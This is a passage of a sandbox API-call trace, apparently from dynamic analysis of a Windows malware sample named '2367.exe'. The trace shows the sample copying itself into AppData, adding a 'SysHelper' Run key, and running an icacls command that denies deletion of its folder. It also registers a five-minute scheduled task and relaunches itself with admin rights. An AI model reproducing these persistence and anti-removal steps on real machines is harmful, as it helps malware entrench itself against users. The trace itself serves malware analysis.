lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.516] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x850000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="subjects tamil terms.exe") returned 0x18 [0109.516] CloseHandle (hObject=0x3e4) returned 1 [0109.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0109.516] CloseHandle (hObject=0x0) returned 0 [0109.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa44) returned 0x0 [0109.516] CloseHandle (hObject=0x0) returned 0 [0109.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb74) returned 0x0 [0109.516] CloseHandle (hObject=0x0) returned 0 [0109.516] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa14) returned 0x3e4 [0109.516] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 1 [0109.518] GetModuleBaseNameW (in: hProcess=0x3e4, hModule=0x400000, lpBaseName=0x18d638, nSize=0x400 | out: lpBaseName="2367.exe") returned 0x8 [0109.518] CloseHandle (hObject=0x3e4) returned 1 [0109.518] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7b0) returned 0x3e4 [0109.518] EnumProcessModules (in: hProcess=0x3e4, lphModule=0x18de54, cb=0x4, lpcbNeeded=0x18de38 | out: lphModule=0x18de54, lpcbNeeded=0x18de38) returned 0 [0109.519] CloseHandle (hObject=0x3e4) returned 1 [0109.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x518) returned 0x0 [0109.519] CloseHandle (hObject=0x0) returned 0 [0109.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x0 [0109.519] CloseHandle (hObject=0x0) returned 0 [0109.519] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d4) returned 0x0 [0109.519] CloseHandle (hObject=0x0) returned 0 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x28) returned 0x3209ba8 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x323b9a8 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x5ccb1d8 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x5cb0790 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x5d3b5f8 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x3242ef0 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x3243158 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x324da58 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x324dcc0 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x5d5f510 [0109.519] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x25c) returned 0x5d5f778 [0109.520] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de38 | out: phkResult=0x18de38*=0x3e4) returned 0x0 [0109.520] RegQueryValueExW (in: hKey=0x3e4, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18de34, lpData=0x18c560, lpcbData=0x18de18*=0x400 | out: lpType=0x18de34*=0x0, lpData=0x18c560*=0x0, lpcbData=0x18de18*=0x400) returned 0x2 [0109.520] RegCloseKey (hKey=0x3e4) returned 0x0 [0109.520] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0109.520] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0109.521] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" " [0109.521] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe\" ", pNumArgs=0x18ddfc | out: pNumArgs=0x18ddfc) returned 0x32b2a00*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0109.521] lstrcpyW (in: lpString1=0x18bd60, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" [0109.521] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe") returned="2367.exe" [0109.521] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d560 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0109.521] UuidCreate (in: Uuid=0x18ddac | out: Uuid=0x18ddac) returned 0x0 [0109.521] UuidToStringW (in: Uuid=0x18ddac, StringUuid=0x18de40 | out: StringUuid=0x18de40) returned 0x0 [0109.521] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x50) returned 0x5cf2108 [0109.521] RpcMgmtStatsVectorFree (in: StatsVector=0x18de40 | out: StatsVector=0x18de40) returned 0x0 [0109.521] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="1e0f3478-f5c6-4d34-8528-dedd9dcd2df7" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7") returned 1 [0109.521] CreateDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7"), lpSecurityAttributes=0x0) returned 1 [0109.522] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xb0) returned 0x5d3e9f0 [0109.522] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xb0) returned 0x5d3eb60 [0109.522] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7", pMore="2367.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned 1 [0109.522] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe")) returned 0 [0109.523] CopyFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\2367.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe"), bFailIfExists=0) returned 1 [0109.558] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18de3c | out: phkResult=0x18de3c*=0x5c8) returned 0x0 [0109.559] lstrcpyW (in: lpString1=0x18cd60, lpString2="\"" | out: lpString1="\"") returned="\"" [0109.559] lstrcatW (in: lpString1="\"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" [0109.559] lstrcatW (in: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe", lpString2="\" --AutoStart" | out: lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart") returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart" [0109.559] lstrlenW (lpString="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart") returned 103 [0109.559] RegSetValueExW (in: hKey=0x5c8, lpValueName="SysHelper", Reserved=0x0, dwType=0x2, lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart", cbData=0xce | out: lpData="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe\" --AutoStart") returned 0x0 [0109.559] RegCloseKey (hKey=0x5c8) returned 0x0 [0109.559] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc0) returned 0x5cc6680 [0109.560] SetLastError (dwErrCode=0x0) [0109.560] lstrcpyW (in: lpString1=0x18ad60, lpString2="icacls \"" | out: lpString1="icacls \"") returned="icacls \"" [0109.560] lstrcatW (in: lpString1="icacls \"", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7" [0109.560] lstrcatW (in: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7", lpString2="\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" | out: lpString1="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\" /deny *S-1-1-0:(OI)(CI)(DE,DC)") returned="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\" /deny *S-1-1-0:(OI)(CI)(DE,DC)" [0109.560] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x48, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18dd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ddbc | out: lpCommandLine="icacls \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\" /deny *S-1-1-0:(OI)(CI)(DE,DC)", lpProcessInformation=0x18ddbc*(hProcess=0x3e4, hThread=0x5c8, dwProcessId=0xaf8, dwThreadId=0xac8)) returned 1 [0109.627] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.790] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.795] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.811] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.826] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.842] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.857] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.873] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.889] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.905] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.932] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.936] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.951] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.967] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.982] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0109.998] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.014] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.041] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.045] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.060] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.076] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.092] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.107] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.124] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.138] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.154] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.170] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.185] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.201] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.216] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x102 [0110.232] WaitForSingleObject (hHandle=0x3e4, dwMilliseconds=0x1) returned 0x0 [0110.246] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d3eb60 | out: hHeap=0x31e0000) returned 1 [0110.246] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cf2108 | out: hHeap=0x31e0000) returned 1 [0110.246] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc0) returned 0x5cc6748 [0110.246] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc0) returned 0x5cc6810 [0110.246] CoInitialize (pvReserved=0x0) returned 0x0 [0110.743] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x80010119 [0110.744] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc0) returned 0x5cc68d8 [0110.744] CoCreateInstance (in: rclsid=0x4d506c*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x4d4fec*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x18de24 | out: ppv=0x18de24*=0x54708e0) returned 0x0 [0111.270] TaskScheduler:ITaskService:Connect (This=0x54708e0, serverName=0x18d8b0*(varType=0x0, wReserved1=0x77c6, wReserved2=0xe0d2, wReserved3=0x77c6, varVal1=0x5f, varVal2=0xc0), user=0x18d8c0*(varType=0x0, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1=0x0, varVal2=0xc8), domain=0x18d8d0*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), password=0x18d8e0*(varType=0x0, wReserved1=0x5d5, wReserved2=0xddcc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x31e0000)) returned 0x0 [0111.273] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0feb8 [0111.273] TaskScheduler:ITaskService:GetFolder (in: This=0x54708e0, Path="\\", ppFolder=0x18de2c | out: ppFolder=0x18de2c*=0x26ff98) returned 0x0 [0111.276] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0feb8 | out: hHeap=0x31e0000) returned 1 [0111.276] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0feb8 [0111.277] ITaskFolder:DeleteTask (This=0x26ff98, Name="Time Trigger Task", flags=0) returned 0x80070002 [0111.279] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0feb8 | out: hHeap=0x31e0000) returned 1 [0111.279] TaskScheduler:ITaskService:NewTask (in: This=0x54708e0, flags=0x0, ppDefinition=0x18de30 | out: ppDefinition=0x18de30*=0x5470968) returned 0x0 [0111.292] TaskScheduler:IUnknown:Release (This=0x54708e0) returned 0x1 [0111.292] ITaskDefinition:get_RegistrationInfo (in: This=0x5470968, ppRegistrationInfo=0x18de04 | out: ppRegistrationInfo=0x18de04*=0x5470a28) returned 0x0 [0111.292] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.292] IRegistrationInfo:put_Author (This=0x5470a28, Author="Author Name") returned 0x0 [0111.292] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.293] IUnknown:Release (This=0x5470a28) returned 0x1 [0111.293] ITaskDefinition:get_Principal (in: This=0x5470968, ppPrincipal=0x18de0c | out: ppPrincipal=0x18de0c*=0x5470bb8) returned 0x0 [0111.293] IPrincipal:put_LogonType (This=0x5470bb8, LogonType=3) returned 0x0 [0111.293] IUnknown:Release (This=0x5470bb8) returned 0x1 [0111.293] ITaskDefinition:get_Settings (in: This=0x5470968, ppSettings=0x18de14 | out: ppSettings=0x18de14*=0x5470ad8) returned 0x0 [0111.293] ITaskSettings:put_StartWhenAvailable (This=0x5470ad8, StartWhenAvailable=1) returned 0x0 [0111.293] IUnknown:Release (This=0x5470ad8) returned 0x1 [0111.293] ITaskSettings:get_IdleSettings (in: This=0x5470ad8, ppIdleSettings=0x18ddf8 | out: ppIdleSettings=0x18ddf8*=0x5470b48) returned 0x0 [0111.293] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.294] IIdleSettings:put_WaitTimeout (This=0x5470b48, WaitTimeout="PT5M") returned 0x0 [0111.294] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.294] IUnknown:Release (This=0x5470b48) returned 0x1 [0111.294] ITaskDefinition:get_Triggers (in: This=0x5470968, ppTriggers=0x18ddf4 | out: ppTriggers=0x18ddf4*=0x5470a98) returned 0x0 [0111.294] ITriggerCollection:Create (in: This=0x5470a98, Type=1, ppTrigger=0x18de00 | out: ppTrigger=0x18de00*=0x5470c18) returned 0x0 [0111.294] IUnknown:Release (This=0x5470a98) returned 0x1 [0111.294] IUnknown:QueryInterface (in: This=0x5470c18, riid=0x4d50ec*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x18de1c | out: ppvObject=0x18de1c*=0x5470c18) returned 0x0 [0111.294] IUnknown:Release (This=0x5470c18) returned 0x2 [0111.294] ITrigger:get_Repetition (in: This=0x5470c18, ppRepeat=0x18de08 | out: ppRepeat=0x18de08*=0x5470c68) returned 0x0 [0111.294] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.294] IRepetitionPattern:put_Interval (This=0x5470c68, Interval="PT5M") returned 0x0 [0111.295] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.295] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.295] IRepetitionPattern:put_Duration (This=0x5470c68, Duration="") returned 0x0 [0111.306] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.315] ITrigger:put_Repetition (This=0x5470c18, Repetition=0x5470c68) returned 0x0 [0111.315] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.315] ITrigger:put_Id (This=0x5470c18, Id="Trigger1") returned 0x0 [0111.316] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.316] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.316] ITrigger:put_EndBoundary (This=0x5470c18, EndBoundary="2030-05-02T08:00:00") returned 0x0 [0111.316] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.316] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18d8dc | out: lpSystemTimeAsFileTime=0x18d8dc*(dwLowDateTime=0x4dd5bb10, dwHighDateTime=0x1d6bf06)) [0111.316] GetLastError () returned 0x0 [0111.316] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x24) returned 0x5d5c3c8 [0111.316] GetLastError () returned 0x0 [0111.317] GetTimeZoneInformation (in: lpTimeZoneInformation=0x511078 | out: lpTimeZoneInformation=0x511078) returned 0x2 [0111.318] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Standard Time", cchWideChar=-1, lpMultiByteStr=0x50af80, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d844 | out: lpMultiByteStr="AUS Eastern Standard Time", lpUsedDefaultChar=0x18d844) returned 26 [0111.319] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="AUS Eastern Daylight Time", cchWideChar=-1, lpMultiByteStr=0x50afc0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x18d844 | out: lpMultiByteStr="AUS Eastern Daylight Time", lpUsedDefaultChar=0x18d844) returned 26 [0111.319] GetLastError () returned 0x0 [0111.319] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0x24) returned 0x5d5c3f8 [0111.319] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5000b8, cbMultiByte=-1, lpWideCharStr=0x5d5c3f8, cchWideChar=18 | out: lpWideCharStr="%Y-%m-%dT%H:%M:%S") returned 18 [0111.319] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xa0) returned 0x5d57fc8 [0111.319] GetLastError () returned 0x0 [0111.319] ITrigger:put_StartBoundary (This=0x5470c18, StartBoundary="2020-11-20T17:29:44") returned 0x0 [0111.319] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.319] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x324a5f8 | out: hHeap=0x31e0000) returned 1 [0111.319] IUnknown:Release (This=0x5470c18) returned 0x1 [0111.319] ITaskDefinition:get_Actions (in: This=0x5470968, ppActions=0x18de10 | out: ppActions=0x18de10*=0x54709e0) returned 0x0 [0111.320] IActionCollection:Create (in: This=0x54709e0, Type=0, ppAction=0x18ddfc | out: ppAction=0x18ddfc*=0x5470ca0) returned 0x0 [0111.321] IUnknown:Release (This=0x54709e0) returned 0x1 [0111.321] IUnknown:QueryInterface (in: This=0x5470ca0, riid=0x4d511c*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x18de18 | out: ppvObject=0x18de18*=0x5470ca0) returned 0x0 [0111.321] IUnknown:Release (This=0x5470ca0) returned 0x2 [0111.321] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.321] IExecAction:put_Path (This=0x5470ca0, Path="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe") returned 0x0 [0111.321] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.321] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.321] IExecAction:put_Arguments (This=0x5470ca0, Arguments="--Task") returned 0x0 [0111.321] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.321] IUnknown:Release (This=0x5470ca0) returned 0x1 [0111.321] RtlAllocateHeap (HeapHandle=0x31e0000, Flags=0x0, Size=0xc) returned 0x5d0ff00 [0111.321] ITaskFolder:RegisterTaskDefinition (in: This=0x26ff98, Path="Time Trigger Task", pDefinition=0x5470968, flags=6, UserId=0x18d8b8*(varType=0x0, wReserved1=0x5d5, wReserved2=0xddcc, wReserved3=0x18, varVal1=0x420cab, varVal2=0x31e0000), password=0x18d8c8*(varType=0x0, wReserved1=0x0, wReserved2=0xc0, wReserved3=0x0, varVal1=0x5f, varVal2=0x7), LogonType=3, sddl=0x18d8dc*(varType=0x8, wReserved1=0x0, wReserved2=0x2, wReserved3=0x0, varVal1="", varVal2=0xc8), ppTask=0x18dde4 | out: ppTask=0x18dde4*=0x5470d10) returned 0x0 [0111.588] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5d0ff00 | out: hHeap=0x31e0000) returned 1 [0111.588] TaskScheduler:IUnknown:Release (This=0x26ff98) returned 0x0 [0111.588] TaskScheduler:IUnknown:Release (This=0x5470968) returned 0x0 [0111.588] IUnknown:Release (This=0x5470d10) returned 0x0 [0111.589] CoUninitialize () [0111.590] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cc68d8 | out: hHeap=0x31e0000) returned 1 [0111.590] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cc6810 | out: hHeap=0x31e0000) returned 1 [0111.590] HeapFree (in: hHeap=0x31e0000, dwFlags=0x0, lpMem=0x5cc6748 | out: hHeap=0x31e0000) returned 1 [0111.590] GetVersion () returned 0x1db10106 [0111.590] lstrcpyW (in: lpString1=0x18e248, lpString2="--Admin" | out: lpString1="--Admin") returned="--Admin" [0111.590] lstrcatW (in: lpString1="--Admin", lpString2=" IsNotAutoStart" | out: lpString1="--Admin IsNotAutoStart") returned="--Admin IsNotAutoStart" [0111.590] lstrcatW (in: lpString1="--Admin IsNotAutoStart", lpString2=" IsNotTask" | out: lpString1="--Admin IsNotAutoStart IsNotTask") returned="--Admin IsNotAutoStart IsNotTask" [0111.590] ShellExecuteExW (in: pExecInfo=0x18e00c*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\2367.exe", lpParameters="--Admin IsNotAutoStart IsNotTask", lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=5, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, 